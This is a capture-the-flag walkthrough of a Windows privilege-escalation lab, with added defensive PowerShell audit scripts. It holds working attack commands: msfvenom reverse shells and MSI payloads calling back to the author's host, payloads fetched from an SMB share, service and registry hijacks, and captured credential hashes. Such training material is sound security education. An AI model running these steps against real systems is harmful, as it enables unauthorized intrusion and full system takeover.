In this walkthrough, we will go through the Windows PrivEsc room from TryHackMe. The room is rated Medium on the platform and lets us practise Windows privilege escalation on an intentionally misconfigured Windows VM that offers several paths to admin/SYSTEM. So, let's get started without further delay.
Table of Contents
Task 1 – Deploy the Vulnerable Windows VM
Task 2 – Generate a Reverse Shell Executable
Question 1 – Generate a reverse shell executable and transfer it to the Windows VM. Check that it works!
Done
wh1terose@fsociety:~/CTF/TryHackme/Windows Privesc$ sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.11.103 LPORT=4444 -f exe -o reverse.exe
/usr/bin/msfvenom: 14: cd: can't cd to /home/wh1terose/CTF/TryHackme/Windows
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.225.25,49812)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:4141414141414141:465098c53c0be448156c5c7263e69cbf:[...]
[-] Unknown level for query path info! 0x109
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.225.25,49812)
[*] Remaining connections []
Task 3 – Service Exploits – Insecure Service Permissions
Question 1 – What is the original BINARY_PATH_NAME of the daclsvc service?
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
[SC] ChangeServiceConfig SUCCESS

C:\PrivEsc>net start daclsvc
C:\Program Files\DACL Service\daclservice.exe
Task 4 – Service Exploits – Unquoted Service Path
Question 1 – What is the BINARY_PATH_NAME of the unquotedsvc service?
C:\PrivEsc>net start daclsvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.

C:\PrivEsc>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
        1 file(s) copied.

C:\PrivEsc>net start unquotedsvc
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
Task 5 – Service Exploits – Weak Registry Permissions
Question 1 – Read and follow along with the above.
Done
C:\PrivEsc>sc qc regsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Insecure Registry Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        KEY_ALL_ACCESS
  RW BUILTIN\Administrators
        KEY_ALL_ACCESS
  RW NT AUTHORITY\INTERACTIVE
        KEY_ALL_ACCESS

C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
The operation completed successfully.

C:\PrivEsc>net start regsvc
Task 6 – Service Exploits – Insecure Service Executables
Question 1 – Read and follow along with the above.
Done
C:\PrivEsc>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\File Permissions Service\filepermservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : File Permissions Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
The system cannot find the file specified.

C:\PrivEsc>copy \\10.18.11.103\kali\reverse.exe C:\PrivEsc\reverse.exe
        1 file(s) copied.

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
        1 file(s) copied.

C:\PrivEsc>net start filepermsvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.
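Tasks 3 to 6 are four variants of one defect: a low-privileged principal can change what a SYSTEM service executes. The script below is an added audit, not part of the room or of accesschk, that re-checks all four conditions the way an administrator would on a host and prints a remediation hint for each finding; the low-privilege identity lists, the write-right mask and the output wording are my own choices.

```powershell
# Added audit script, not part of the TryHackMe room or its tooling: re-checks the
# four service misconfigurations from Tasks 3-6 and prints a remediation hint for
# each finding. Run from an elevated PowerShell session on the host being audited.
$lowPrivSids  = 'BU','AU','WD','IU','S-1-5-32-545','S-1-5-11','S-1-1-0','S-1-5-4'   # SDDL aliases / SIDs
$lowPrivNames = 'Everyone','BUILTIN\Users','NT AUTHORITY\Authenticated Users','NT AUTHORITY\INTERACTIVE'
# WriteData/SetValue, Delete, WriteDAC, WriteOwner, GENERIC_ALL, GENERIC_WRITE: each is enough to swap a binary or ImagePath
$writeBits = 0x500D0002

function Get-WeakWriters {
    # Low-privilege identities holding a write-class right directly on a file, directory or registry key.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    foreach ($ace in $acl.Access) {
        $rights = if ($ace.PSObject.Properties['FileSystemRights']) { [int]$ace.FileSystemRights } else { [int]$ace.RegistryRights }
        if ($ace.AccessControlType -eq 'Allow' -and $lowPrivNames -contains $ace.IdentityReference.Value -and
            ($rights -band $writeBits) -and -not ([int]$ace.PropagationFlags -band 2)) {   # 2 = InheritOnly: not for this object
            $ace.IdentityReference.Value
        }
    }
}

function Get-WeakServiceDaclSids {
    # Low-privilege ACEs in the service SDDL (sc.exe sdshow) granting SERVICE_CHANGE_CONFIG (DC), WRITE_DAC (WD),
    # WRITE_OWNER (WO), GENERIC_WRITE (GW) or GENERIC_ALL (GA); the (..)*? prefix keeps the match on a 2-letter code boundary.
    param([string]$Name)
    $sddl = (& sc.exe sdshow $Name) -join ''
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);[^;]*;[^;]*;([^)]+)\)')) {
        if ($lowPrivSids -contains $m.Groups[2].Value -and $m.Groups[1].Value -match '^(..)*?(DC|WD|WO|GW|GA)') { $m.Groups[2].Value }
    }
}

foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.PathName }) {
    $path = $svc.PathName
    $exe  = if ($path -match '^"([^"]+)"') { $Matches[1] } else { $path -replace '(?i)(\.exe).*$', '$1' }
    $name = $svc.Name
    if ($who = Get-WeakServiceDaclSids $name) {                                    # Task 3: insecure service permissions
        "[$name] service DACL grants config change to $($who -join ','): reset it with sc.exe sdset and a tightened SDDL"
    }
    if ($path -notmatch '^"' -and $exe -match '\s') {                              # Task 4: unquoted service path
        # Windows tries C:\Program.exe, C:\Program Files\Unquoted.exe, ... so every ancestor of the exe's folder matters
        $dirs = for ($d = Split-Path (Split-Path $exe); $d; $d = Split-Path $d) { $d }
        $bad  = @($dirs | Where-Object { Get-WeakWriters $_ })
        "[$name] unquoted path '$path'$(if ($bad) { ' with writable dir(s) ' + ($bad -join ', ') }): quote it via sc.exe config binPath="
    }
    if ($who = @(Get-WeakWriters "HKLM:\SYSTEM\CurrentControlSet\Services\$name")) {   # Task 5: weak registry permissions
        "[$name] $($who -join ',') can rewrite ImagePath under HKLM\SYSTEM\CurrentControlSet\Services\$name: remove that ACE"
    }
    if ((Test-Path -LiteralPath $exe) -and ($who = @(Get-WeakWriters $exe))) {     # Task 6: insecure service executable
        "[$name] $($who -join ',') can replace '$exe': icacls `"$exe`" /remove:g <identity> for each of them"
    }
}
```

On the room's VM this reports daclsvc, unquotedsvc (with C:\Program Files\Unquoted Path Service as the writable folder), regsvc (NT AUTHORITY\INTERACTIVE) and filepermsvc (Everyone and BUILTIN\Users), matching the accesschk output above.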
Task 7 – Registry – AutoRuns
Question 1 – Read and follow along with the above.
Done
C:\PrivEsc>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    My Program        REG_SZ           "C:\Program Files\Autorun Program\program.exe"

C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

AccessChk v4.02 - Check access of files, keys, objects, processes or services
Copyright (C) 2006-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS

C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
        1 file(s) copied.
Task 8 – Registry – AlwaysInstallElevated
Question 1 – Read and follow along with the above.
Done
wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.11.103 LPORT=1234 -f msi -o reverse.msi
[?] Would you like to init the webservice? (Not Required) [no]: no
[?] Would you like to delete your existing data and configurations? []: yes
Clearing http web data service credentials in msfconsole
Running the 'init' command for the database:
Existing database found, attempting to start it
Starting database at /home/wh1terose/.msf4/db...success
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi

wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ ls
reverse.exe  reverse.msi

wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
[sudo] password for wh1terose:
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.165.120,49710)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:4141414141414141:b978bb131fc26e4ee84d9fc63507ea58:[...]
[-] Unknown level for query path info! 0x109
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)
C:\PrivEsc>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

C:\PrivEsc>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

C:\PrivEsc>copy \\10.18.11.103\kali\reverse.msi C:\PrivEsc\reverse.msi
        1 file(s) copied.

C:\PrivEsc>msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

C:\PrivEsc>
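The two registry tasks from the defender's side, again as an added script rather than material from the room: it lists Run/RunOnce entries whose target binary a standard user could overwrite (Task 7) and reports, and with -Fix clears, the AlwaysInstallElevated values in both hives (Task 8). The key list, the identity list and the -Fix switch are my own assumptions.

```powershell
# Added hardening check, not part of the room: Task 7 (AutoRun binaries writable by
# standard users) and Task 8 (AlwaysInstallElevated). Run elevated; -Fix removes the
# AlwaysInstallElevated values. HKCU here is the hive of the account running the script.
param([switch]$Fix)

$lowPriv = 'Everyone','BUILTIN\Users','NT AUTHORITY\Authenticated Users'
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
$psMeta  = 'PSPath','PSParentPath','PSChildName','PSDrive','PSProvider'   # provider noise on Get-ItemProperty output

foreach ($key in $runKeys | Where-Object { Test-Path $_ }) {
    $entries = Get-ItemProperty -Path $key
    foreach ($p in $entries.PSObject.Properties | Where-Object { $_.Name -notin $psMeta }) {
        # Expand %windir%-style values (REG_EXPAND_SZ), then strip quotes and trailing arguments
        $raw = [Environment]::ExpandEnvironmentVariables([string]$p.Value)
        $exe = if ($raw -match '^"([^"]+)"') { $Matches[1] } else { $raw -replace '(?i)(\.exe).*$', '$1' }
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        $weak = (Get-Acl -LiteralPath $exe).Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and $lowPriv -contains $_.IdentityReference.Value -and
            $_.FileSystemRights.ToString() -match '(^|, )(Write|WriteData|Modify|FullControl)(,|$)'
        } | ForEach-Object { $_.IdentityReference.Value }
        if ($weak) { "AutoRun '$($p.Name)' -> $exe is writable by $($weak -join ', '): icacls `"$exe`" /remove:g <identity>" }
    }
}

# The policy is effective only when BOTH the machine and the user value are 1; the machine
# value is set by Computer Configuration > Administrative Templates > Windows Components > Windows Installer.
foreach ($hive in 'HKLM','HKCU') {
    $key = "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer"
    $val = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($val -and $val.AlwaysInstallElevated -eq 1) {
        "$hive AlwaysInstallElevated = 1: any MSI a standard user installs runs as SYSTEM"
        if ($Fix) { Remove-ItemProperty -Path $key -Name AlwaysInstallElevated; "  removed from $hive" }
    }
}
```

On the room's VM the first loop flags "My Program" (Everyone and BUILTIN\Users hold FILE_ALL_ACCESS on program.exe) and the second loop reports both hives, matching the reg query output above.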
Task 9 – Passwords – Registry
Question 1 – What was the admin password you found in the registry?
password123
Task 10 – Passwords – Saved Creds
Question 1 – Read and follow along with the above.
Done
C:\PrivEsc>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02nfpgrklkitqatu
    Local machine persistence

    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin

C:\PrivEsc>runas /savecred /user:admin C:\PrivEsc\reverse.exe
Attempting to start C:\PrivEsc\reverse.exe as user "WIN-QBA94KB3IOF\admin" ...

C:\PrivEsc>savecred.bat

C:\PrivEsc>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02nfpgrklkitqatu
    Local machine persistence

    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin

C:\PrivEsc>
Task 11 – Passwords – Security Account Manager (SAM)
Question 1 – What is the NTLM hash of the admin user?
a9fdfa038c4b75ebc76dc855dd74f0da
Task 12 – Passwords – Passing the Hash
Task 13 – Scheduled Tasks
Task 14 – Insecure GUI Apps
Task 15 – Startup Apps
Task 16 – Token Impersonation – Rogue Potato
Question 1 – Name one user privilege that allows this exploit to work.
SeImpersonatePrivilege
Question 2 – Name the other user privilege that allows this exploit to work.
SeAssignPrimaryTokenPrivilege
Task 17 – Token Impersonation – PrintSpoofer
Task 18 – Privilege Escalation Scripts
So that was "Windows PrivEsc" for you. In this room we covered a variety of Windows privilege escalation techniques that can be used once we have landed on a Windows machine. The best place to be on any machine is SYSTEM/admin, and today we learned how to get there. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".